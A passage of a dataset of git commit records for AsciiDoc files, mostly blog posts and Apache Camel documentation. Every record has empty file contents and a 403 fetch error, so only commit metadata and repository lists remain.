2017-07-28-Goal-Tracking.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2017-07-28-Goal-Tracking.adoc","new_file":"_posts\/2017-07-28-Goal-Tracking.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4de5a752840b1eb7f1f7147f8e95dfcbd9ac7a90","subject":"Update 2016-04-12-un-poco-sobre-Metasploit.adoc","message":"Update 2016-04-12-un-poco-sobre-Metasploit.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-12-un-poco-sobre-Metasploit.adoc","new_file":"_posts\/2016-04-12-un-poco-sobre-Metasploit.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"33a33e72a6769e2c8c1ea1978302a2a66dadf1b0","subject":"Update 2016-09-13-Encrypted-Hetzner-Server.adoc","message":"Update 2016-09-13-Encrypted-Hetzner-Server.adoc","repos":"nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io","old_file":"_posts\/2016-09-13-Encrypted-Hetzner-Server.adoc","new_file":"_posts\/2016-09-13-Encrypted-Hetzner-Server.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nilsonline\/nilsonline.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f1d754468d125e5fee09b3ac962d968cb1733c4d","subject":"y2b create post It Knows How Fat You Are...","message":"y2b create post It Knows How Fat You Are...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-07-19-It-Knows-How-Fat-You-Are.adoc","new_file":"_posts\/2017-07-19-It-Knows-How-Fat-You-Are.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7c23b7759722c8c4d25dcda79103a9f272e1a4bf","subject":"Update 2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","message":"Update 2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","new_file":"_posts\/2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b33862e5583ad1c2a9870663631fc08176c3f08f","subject":"Update 2016-03-31-Mensajes-ocultos-parte-1.adoc","message":"Update 2016-03-31-Mensajes-ocultos-parte-1.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-31-Mensajes-ocultos-parte-1.adoc","new_file":"_posts\/2016-03-31-Mensajes-ocultos-parte-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2316553a37349cb5983194b9f4ddfddf97a11e5d","subject":"Update 2017-01-31-Video-Updating-your-Satellite-6-system.adoc","message":"Update 2017-01-31-Video-Updating-your-Satellite-6-system.adoc","repos":"wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io","old_file":"_posts\/2017-01-31-Video-Updating-your-Satellite-6-system.adoc","new_file":"_posts\/2017-01-31-Video-Updating-your-Satellite-6-system.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wzzrd\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9a2de5ec4c3fafce6776f7b1aa325c5160365e9b","subject":"Update 2017-07-05-Ansible-and-rolling-upgrades.adoc","message":"Update 2017-07-05-Ansible-and-rolling-upgrades.adoc","repos":"gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io","old_file":"_posts\/2017-07-05-Ansible-and-rolling-upgrades.adoc","new_file":"_posts\/2017-07-05-Ansible-and-rolling-upgrades.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gquintana\/gquintana.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"393b551cf5e8f1000f8cc45435cf57e1e34ed444","subject":"Update 2017-10-10-Use-Storage-Service-Securely.adoc","message":"Update 2017-10-10-Use-Storage-Service-Securely.adoc","repos":"wushaobo\/wushaobo.github.io,wushaobo\/wushaobo.github.io,wushaobo\/wushaobo.github.io,wushaobo\/wushaobo.github.io","old_file":"_posts\/2017-10-10-Use-Storage-Service-Securely.adoc","new_file":"_posts\/2017-10-10-Use-Storage-Service-Securely.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wushaobo\/wushaobo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2367f59ae40c1393536cb671490075c61ff64727","subject":"create post Unboxing Jack's New Laptop...","message":"create post Unboxing Jack's New Laptop...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-26-Unboxing-Jacks-New-Laptop....adoc","new_file":"_posts\/2018-02-26-Unboxing-Jacks-New-Laptop....adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cb1aae388ca83783909fe4d2952e796c8d6514c8","subject":"\u0410\u0443\u0434\u0438\u0442\u043e\u0440\u0438\u0441\u043a\u0430 \u0432\u0435\u0436\u0431\u0430 11","message":"\u0410\u0443\u0434\u0438\u0442\u043e\u0440\u0438\u0441\u043a\u0430 \u0432\u0435\u0436\u0431\u0430 11","repos":"finki-mk\/SP,finki-mk\/SP","old_file":"docs\/src\/sp_av11.adoc","new_file":"docs\/src\/sp_av11.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/finki-mk\/SP.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8427bcbb9de673d07c9d93887a7a5a37c4f29d15","subject":"Added setFaultBody EIP docs","message":"Added setFaultBody EIP docs\n","repos":"zregvart\/camel,cunningt\/camel,gautric\/camel,nicolaferraro\/camel,christophd\/camel,kevinearls\/camel,nicolaferraro\/camel,snurmine\/camel,alvinkwekel\/camel,curso007\/camel,snurmine\/camel,gnodet\/camel,DariusX\/camel,adessaigne\/camel,onders86\/camel,CodeSmell\/camel,pax95\/camel,apache\/camel,onders86\/camel,mcollovati\/camel,gautric\/camel,gautric\/camel,apache\/camel,nikhilvibhav\/camel,nikhilvibhav\/camel,sverkera\/camel,ullgren\/camel,snurmine\/camel,onders86\/camel,zregvart\/camel,alvinkwekel\/camel,tdiesler\/camel,anoordover\/camel,pmoerenhout\/camel,anoordover\/camel,jonmcewen\/camel,tdiesler\/camel,zregvart\/camel,pmoerenhout\/camel,pax95\/camel,pmoerenhout\/camel,davidkarlsen\/camel,dmvolod\/camel,objectiser\/camel,tdiesler\/camel,jamesnetherton\/camel,dmvolod\/camel,CodeSmell\/camel,tadayosi\/camel,jonmcewen\/camel,dmvolod\/camel,alvinkwekel\/camel,cunningt\/camel,adessaigne\/camel,davidkarlsen\/camel,anoordover\/camel,sverkera\/camel,objectiser\/camel,zregvart\/camel,akhettar\/camel,snurmine\/camel,objectiser\/camel,snurmine\/camel,sverkera\/camel,gnodet\/camel,tadayosi\/camel,adessaigne\/camel,christophd\/camel,punkhorn\/camel-upstream,punkhorn\/camel-upstream,akhettar\/camel,pax95\/camel,tdiesler\/camel,cunningt\/camel,sverkera\/camel,christophd\/camel,gnodet\/camel,ullgren\/camel,nikhilvibhav\/camel,kevinearls\/camel,gautric\/camel,cunningt\/camel,apache\/camel,anoordover\/camel,curso007\/camel,adessaigne\/camel,curso007\/camel,adessaigne\/camel,pax95\/camel,mcollovati\/camel,christophd\/camel,cunningt\/camel,Fabryprog\/camel,onders86\/camel,apache\/camel,pmoerenhout\/camel,akhettar\/camel,akhettar\/camel,tdiesler\/camel,akhettar\/camel,curso007\/camel,pax95\/camel,DariusX\/camel,jonmcewen\/camel,dmvolod\/camel,snurmine\/camel,jonmcewen\/camel,christophd\/camel,davidkarlsen\/camel,mcollovati\/camel,gautric\/camel,akhettar\/camel,pmoerenhout\/camel,kevinearls\/camel,ullgren\/camel,jonmcewen\/camel,dmvolod\/camel,onders86\/camel,gnodet\/camel,tadayosi\/camel,kevinearls\/camel,tdiesler\/camel,punkhorn\/camel-upstream,jamesnetherton\/camel,jonmcewen\/camel,davidkarlsen\/camel,DariusX\/camel,CodeSmell\/camel,jamesnetherton\/camel,tadayosi\/camel,anoordover\/camel,gnodet\/camel,CodeSmell\/camel,pax95\/camel,anoordover\/camel,dmvolod\/camel,nikhilvibhav\/camel,christophd\/camel,sverkera\/camel,Fabryprog\/camel,nicolaferraro\/camel,pmoerenhout\/camel,kevinearls\/camel,apache\/camel,curso007\/camel,Fabryprog\/camel,nicolaferraro\/camel,gautric\/camel,objectiser\/camel,cunningt\/camel,jamesnetherton\/camel,mcollovati\/camel,tadayosi\/camel,DariusX\/camel,adessaigne\/camel,apache\/camel,kevinearls\/camel,tadayosi\/camel,sverkera\/camel,onders86\/camel,jamesnetherton\/camel,punkhorn\/camel-upstream,Fabryprog\/camel,ullgren\/camel,jamesnetherton\/camel,alvinkwekel\/camel,curso007\/camel","old_file":"camel-core\/src\/main\/docs\/eips\/setFaultBody-eip.adoc","new_file":"camel-core\/src\/main\/docs\/eips\/setFaultBody-eip.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e7261dcfa093ec9367af797022be254d970c553e","subject":"Equipment list","message":"Equipment list\n\nA test of mixing equipment list as an asciidoc with RG's github website.","repos":"RobotGarden\/RobotGarden.github.io,RobotGarden\/RobotGarden.github.io","old_file":"Equipment.adoc","new_file":"Equipment.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/RobotGarden\/RobotGarden.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ea0ee31fe02727c3a237fd3f369f108bc37a4365","subject":"update title","message":"update title","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/writings\/on_side_effects_of_technology.adoc","new_file":"content\/writings\/on_side_effects_of_technology.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/podviaznikov\/podviaznikov.com.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"4c5b9c032207caca2068007fc1943736f4f68dde","subject":"[CAMEL-9869] Create Apache Flink Component","message":"[CAMEL-9869] Create Apache Flink Component\n","repos":"jlpedrosa\/camel,pax95\/camel,Fabryprog\/camel,mgyongyosi\/camel,chirino\/camel,bgaudaen\/camel,punkhorn\/camel-upstream,zregvart\/camel,akhettar\/camel,mcollovati\/camel,cunningt\/camel,neoramon\/camel,apache\/camel,borcsokj\/camel,pax95\/camel,ssharma\/camel,adessaigne\/camel,davidkarlsen\/camel,mgyongyosi\/camel,Fabryprog\/camel,tdiesler\/camel,zregvart\/camel,cunningt\/camel,Thopap\/camel,bhaveshdt\/camel,DariusX\/camel,jarst\/camel,CodeSmell\/camel,onders86\/camel,gautric\/camel,christophd\/camel,pmoerenhout\/camel,akhettar\/camel,arnaud-deprez\/camel,yuruki\/camel,acartapanis\/camel,jkorab\/camel,bhaveshdt\/camel,jonmcewen\/camel,adessaigne\/camel,pkletsko\/camel,objectiser\/camel,jarst\/camel,jmandawg\/camel,anton-k11\/camel,YoshikiHigo\/camel,sabre1041\/camel,sverkera\/camel,apache\/camel,jkorab\/camel,kevinearls\/camel,FingolfinTEK\/camel,drsquidop\/camel,pkletsko\/camel,driseley\/camel,curso007\/camel,scranton\/camel,tadayosi\/camel,yuruki\/camel,oalles\/camel,nikhilvibhav\/camel,bhaveshdt\/camel,apache\/camel,tkopczynski\/camel,allancth\/camel,NickCis\/camel,sirlatrom\/camel,isavin\/camel,Fabryprog\/camel,gautric\/camel,tkopczynski\/camel,mgyongyosi\/camel,snurmine\/camel,jarst\/camel,w4tson\/camel,isavin\/camel,prashant2402\/camel,tadayosi\/camel,Thopap\/camel,punkhorn\/camel-upstream,pmoerenhout\/camel,jonmcewen\/camel,sirlatrom\/camel,RohanHart\/camel,edigrid\/camel,w4tson\/camel,anton-k11\/camel,sabre1041\/camel,acartapanis\/camel,anoordover\/camel,onders86\/camel,chirino\/camel,tdiesler\/camel,nicolaferraro\/camel,edigrid\/camel,alvinkwekel\/camel,zregvart\/camel,anton-k11\/camel,neoramon\/camel,prashant2402\/camel,akhettar\/camel,driseley\/camel,drsquidop\/camel,jonmcewen\/camel,yuruki\/camel,kevinearls\/camel,dmvolod\/camel,prashant2402\/camel,gilfernandes\/camel,gnodet\/camel,sabre1041\/camel,RohanHart\/camel,RohanHart\/camel,salikjan\/camel,christophd\/camel,pkletsko\/camel,RohanHart\/camel,cunningt\/camel,adessaigne\/camel,FingolfinTEK\/camel,JYBESSON\/camel,mcollovati\/camel,FingolfinTEK\/camel,apache\/camel,objectiser\/camel,JYBESSON\/camel,mgyongyosi\/camel,snurmine\/camel,nikvaessen\/camel,bgaudaen\/camel,tlehoux\/camel,veithen\/camel,curso007\/camel,jamesnetherton\/camel,bgaudaen\/camel,veithen\/camel,pax95\/camel,arnaud-deprez\/camel,neoramon\/camel,scranton\/camel,jmandawg\/camel,zregvart\/camel,drsquidop\/camel,adessaigne\/camel,kevinearls\/camel,pkletsko\/camel,tkopczynski\/camel,gilfernandes\/camel,lburgazzoli\/apache-camel,hqstevenson\/camel,mcollovati\/camel,hqstevenson\/camel,oalles\/camel,veithen\/camel,pax95\/camel,punkhorn\/camel-upstream,nboukhed\/camel,bhaveshdt\/camel,borcsokj\/camel,bgaudaen\/camel,tdiesler\/camel,yuruki\/camel,nboukhed\/camel,bhaveshdt\/camel,arnaud-deprez\/camel,YoshikiHigo\/camel,jamesnetherton\/camel,anton-k11\/camel,mgyongyosi\/camel,jlpedrosa\/camel,ssharma\/camel,Fabryprog\/camel,sverkera\/camel,acartapanis\/camel,nikvaessen\/camel,jkorab\/camel,christophd\/camel,JYBESSON\/camel,gautric\/camel,driseley\/camel,jonmcewen\/camel,nicolaferraro\/camel,gilfernandes\/camel,akhettar\/camel,sirlatrom\/camel,drsquidop\/camel,curso007\/camel,w4tson\/camel,jlpedrosa\/camel,gautric\/camel,JYBESSON\/camel,gnodet\/camel,YoshikiHigo\/camel,nikhilvibhav\/camel,nboukhed\/camel,snurmine\/camel,veithen\/camel,oalles\/camel,kevinearls\/camel,cunningt\/camel,onders86\/camel,jamesnetherton\/camel,lburgazzoli\/apache-camel,rmarting\/camel,rmarting\/camel,snurmine\/camel,neoramon\/camel,tlehoux\/camel,hqstevenson\/camel,nboukhed\/camel,tkopczynski\/camel,nikvaessen\/camel,allancth\/camel,sabre1041\/camel,jarst\/camel,RohanHart\/camel,allancth\/camel,sirlatrom\/camel,prashant2402\/camel,sabre1041\/camel,acartapanis\/camel,tdiesler\/camel,hqstevenson\/camel,snurmine\/camel,lburgazzoli\/camel,chirino\/camel,sverkera\/camel,ssharma\/camel,nikvaessen\/camel,allancth\/camel,dmvolod\/camel,NickCis\/camel,ullgren\/camel,jonmcewen\/camel,adessaigne\/camel,acartapanis\/camel,curso007\/camel,nicolaferraro\/camel,nikvaessen\/camel,cunningt\/camel,tlehoux\/camel,davidkarlsen\/camel,w4tson\/camel,jkorab\/camel,borcsokj\/camel,anoordover\/camel,chirino\/camel,pkletsko\/camel,oalles\/camel,pax95\/camel,RohanHart\/camel,gnodet\/camel,lburgazzoli\/camel,sverkera\/camel,alvinkwekel\/camel,nboukhed\/camel,CodeSmell\/camel,tkopczynski\/camel,lburgazzoli\/apache-camel,onders86\/camel,rmarting\/camel,edigrid\/camel,jmandawg\/camel,apache\/camel,yuruki\/camel,borcsokj\/camel,tkopczynski\/camel,jkorab\/camel,lburgazzoli\/apache-camel,christophd\/camel,christophd\/camel,pmoerenhout\/camel,sverkera\/camel,jarst\/camel,Thopap\/camel,gilfernandes\/camel,bhaveshdt\/camel,gautric\/camel,adessaigne\/camel,tlehoux\/camel,borcsokj\/camel,rmarting\/camel,driseley\/camel,anoordover\/camel,pax95\/camel,FingolfinTEK\/camel,sirlatrom\/camel,nikhilvibhav\/camel,arnaud-deprez\/camel,bgaudaen\/camel,isavin\/camel,YoshikiHigo\/camel,ullgren\/camel,Thopap\/camel,ullgren\/camel,tdiesler\/camel,anoordover\/camel,driseley\/camel,gautric\/camel,jamesnetherton\/camel,veithen\/camel,nicolaferraro\/camel,drsquidop\/camel,jamesnetherton\/camel,arnaud-deprez\/camel,borcsokj\/camel,nboukhed\/camel,hqstevenson\/camel,mcollovati\/camel,neoramon\/camel,curso007\/camel,FingolfinTEK\/camel,CodeSmell\/camel,ssharma\/camel,DariusX\/camel,lburgazzoli\/camel,jmandawg\/camel,CodeSmell\/camel,jamesnetherton\/camel,rmarting\/camel,rmarting\/camel,NickCis\/camel,w4tson\/camel,jlpedrosa\/camel,isavin\/camel,nikvaessen\/camel,acartapanis\/camel,curso007\/camel,lburgazzoli\/apache-camel,veithen\/camel,jmandawg\/camel,yuruki\/camel,tlehoux\/camel,akhettar\/camel,driseley\/camel,jlpedrosa\/camel,nikhilvibhav\/camel,YoshikiHigo\/camel,objectiser\/camel,davidkarlsen\/camel,sverkera\/camel,anton-k11\/camel,dmvolod\/camel,akhettar\/camel,gilfernandes\/camel,jmandawg\/camel,NickCis\/camel,tadayosi\/camel,chirino\/camel,lburgazzoli\/camel,chirino\/camel,jarst\/camel,lburgazzoli\/apache-camel,drsquidop\/camel,tlehoux\/camel,isavin\/camel,pmoerenhout\/camel,hqstevenson\/camel,sirlatrom\/camel,scranton\/camel,dmvolod\/camel,anoordover\/camel,ssharma\/camel,mgyongyosi\/camel,pmoerenhout\/camel,cunningt\/camel,christophd\/camel,arnaud-deprez\/camel,w4tson\/camel,kevinearls\/camel,scranton\/camel,edigrid\/camel,YoshikiHigo\/camel,gilfernandes\/camel,tdiesler\/camel,sabre1041\/camel,allancth\/camel,FingolfinTEK\/camel,isavin\/camel,tadayosi\/camel,alvinkwekel\/camel,jonmcewen\/camel,oalles\/camel,anoordover\/camel,dmvolod\/camel,dmvolod\/camel,neoramon\/camel,salikjan\/camel,apache\/camel,JYBESSON\/camel,prashant2402\/camel,edigrid\/camel,onders86\/camel,gnodet\/camel,oalles\/camel,anton-k11\/camel,prashant2402\/camel,JYBESSON\/camel,jkorab\/camel,onders86\/camel,gnodet\/camel,DariusX\/camel,alvinkwekel\/camel,ullgren\/camel,bgaudaen\/camel,DariusX\/camel,allancth\/camel,tadayosi\/camel,ssharma\/camel,scranton\/camel,pmoerenhout\/camel,NickCis\/camel,Thopap\/camel,tadayosi\/camel,Thopap\/camel,scranton\/camel,objectiser\/camel,lburgazzoli\/camel,jlpedrosa\/camel,pkletsko\/camel,lburgazzoli\/camel,edigrid\/camel,snurmine\/camel,punkhorn\/camel-upstream,davidkarlsen\/camel,kevinearls\/camel,NickCis\/camel","old_file":"components\/camel-flink\/src\/main\/docs\/flink.adoc","new_file":"components\/camel-flink\/src\/main\/docs\/flink.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/allancth\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1053750d443f1445109efc055dc19e2720cb9b16","subject":"Update 2015-03-03-1500-Le-Sport.adoc","message":"Update 2015-03-03-1500-Le-Sport.adoc","repos":"TeksInHelsinki\/TeksInHelsinki.github.io,TeksInHelsinki\/TeksInHelsinki.github.io,TeksInHelsinki\/TeksInHelsinki.github.io","old_file":"_posts\/2015-03-03-1500-Le-Sport.adoc","new_file":"_posts\/2015-03-03-1500-Le-Sport.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TeksInHelsinki\/TeksInHelsinki.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e17d4e3fbdfa75b8c969f0560c30a82536d3dde1","subject":"Update 2017-07-07-Cloud-Spanner.adoc","message":"Update 2017-07-07-Cloud-Spanner.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-07-Cloud-Spanner.adoc","new_file":"_posts\/2017-07-07-Cloud-Spanner.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3bdfc07cb37b46298f77e14ea78ed0ffb2c5b378","subject":"Update 2017-01-12-Vulnhub-la-serie-capitulo-uno-Leave-me-here.adoc","message":"Update 2017-01-12-Vulnhub-la-serie-capitulo-uno-Leave-me-here.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2017-01-12-Vulnhub-la-serie-capitulo-uno-Leave-me-here.adoc","new_file":"_posts\/2017-01-12-Vulnhub-la-serie-capitulo-uno-Leave-me-here.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9428da555b95d7aab6e8d9ae5bb2c1cd565d07c2","subject":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"13a30873eb23a37b0a664ea1c27f608d3d54fef7","subject":"Added Proximity integration guide","message":"Added Proximity integration guide\n","repos":"mrquincle\/nRF51-ble-bcast-mesh,ihassin\/nRF51-ble-bcast-mesh,mrquincle\/nRF51-ble-bcast-mesh,mrquincle\/nRF51-ble-bcast-mesh,mrquincle\/nRF51-ble-bcast-mesh,ihassin\/nRF51-ble-bcast-mesh","old_file":"docs\/integrating_w_SD_apps.adoc","new_file":"docs\/integrating_w_SD_apps.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mrquincle\/nRF51-ble-bcast-mesh.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"5d336a5b1ca8f42c2c4b119f43f8ef9c4643af32","subject":"Update 2016-08-05-Eureka.adoc","message":"Update 2016-08-05-Eureka.adoc","repos":"erramuzpe\/gsoc2016,erramuzpe\/gsoc2016,erramuzpe\/gsoc2016,erramuzpe\/gsoc2016","old_file":"_posts\/2016-08-05-Eureka.adoc","new_file":"_posts\/2016-08-05-Eureka.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/erramuzpe\/gsoc2016.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"151cd36cd9d69c3202d0cba893058c3d7bdd6be9","subject":"Add reference page for cljs.main","message":"Add reference page for cljs.main\n","repos":"clojure\/clojurescript-site","old_file":"content\/reference\/repl-and-main.adoc","new_file":"content\/reference\/repl-and-main.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojurescript-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"9f6281d61afdfda0c42078d823b1157a4e0d07db","subject":"Update 2016-07-22-Stable-Graph-Matching.adoc","message":"Update 2016-07-22-Stable-Graph-Matching.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1767abc6b30276613817fb889b25839dd2564c78","subject":"Update 2016-11-14-Hacking-al-dia-141116.adoc","message":"Update 2016-11-14-Hacking-al-dia-141116.adoc","repos":"Port666\/hubpress.io,Port666\/hubpress.io,Port666\/hubpress.io,Port666\/hubpress.io","old_file":"_posts\/2016-11-14-Hacking-al-dia-141116.adoc","new_file":"_posts\/2016-11-14-Hacking-al-dia-141116.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Port666\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"669def57c79c9064015b74af18e0c61ef9c5c878","subject":"Update 2016-08-12-Final-Week-Time-to-wrap-up.adoc","message":"Update 2016-08-12-Final-Week-Time-to-wrap-up.adoc","repos":"erramuzpe\/gsoc2016,erramuzpe\/gsoc2016,erramuzpe\/gsoc2016,erramuzpe\/gsoc2016","old_file":"_posts\/2016-08-12-Final-Week-Time-to-wrap-up.adoc","new_file":"_posts\/2016-08-12-Final-Week-Time-to-wrap-up.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/erramuzpe\/gsoc2016.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"000705a0932b4363280da874902a0eec68ed7771","subject":"job #11949 - Analysis Note","message":"job #11949 - Analysis Note\n","repos":"xtuml\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,xtuml\/bridgepoint,keithbrown\/bridgepoint,keithbrown\/bridgepoint,xtuml\/bridgepoint,rmulvey\/bridgepoint,rmulvey\/bridgepoint,xtuml\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,xtuml\/bridgepoint,travislondon\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,keithbrown\/bridgepoint,lwriemen\/bridgepoint,rmulvey\/bridgepoint,travislondon\/bridgepoint,travislondon\/bridgepoint,lwriemen\/bridgepoint,rmulvey\/bridgepoint,travislondon\/bridgepoint,keithbrown\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,rmulvey\/bridgepoint,travislondon\/bridgepoint,rmulvey\/bridgepoint,leviathan747\/bridgepoint,rmulvey\/bridgepoint,cortlandstarrett\/bridgepoint,leviathan747\/bridgepoint,leviathan747\/bridgepoint,leviathan747\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,travislondon\/bridgepoint,cortlandstarrett\/bridgepoint,keithbrown\/bridgepoint,keithbrown\/bridgepoint,xtuml\/bridgepoint,leviathan747\/bridgepoint,xtuml\/bridgepoint,travislondon\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,travislondon\/bridgepoint,keithbrown\/bridgepoint,lwriemen\/bridgepoint","old_file":"doc-bridgepoint\/notes\/11949_GD_CTXT_fix\/11949_GD_CTXT_fix_ant.adoc","new_file":"doc-bridgepoint\/notes\/11949_GD_CTXT_fix\/11949_GD_CTXT_fix_ant.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rmulvey\/bridgepoint.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5a5e42e20c0968a342d15aec60379832b6dfce30","subject":"Update 2018-09-10-Go.adoc","message":"Update 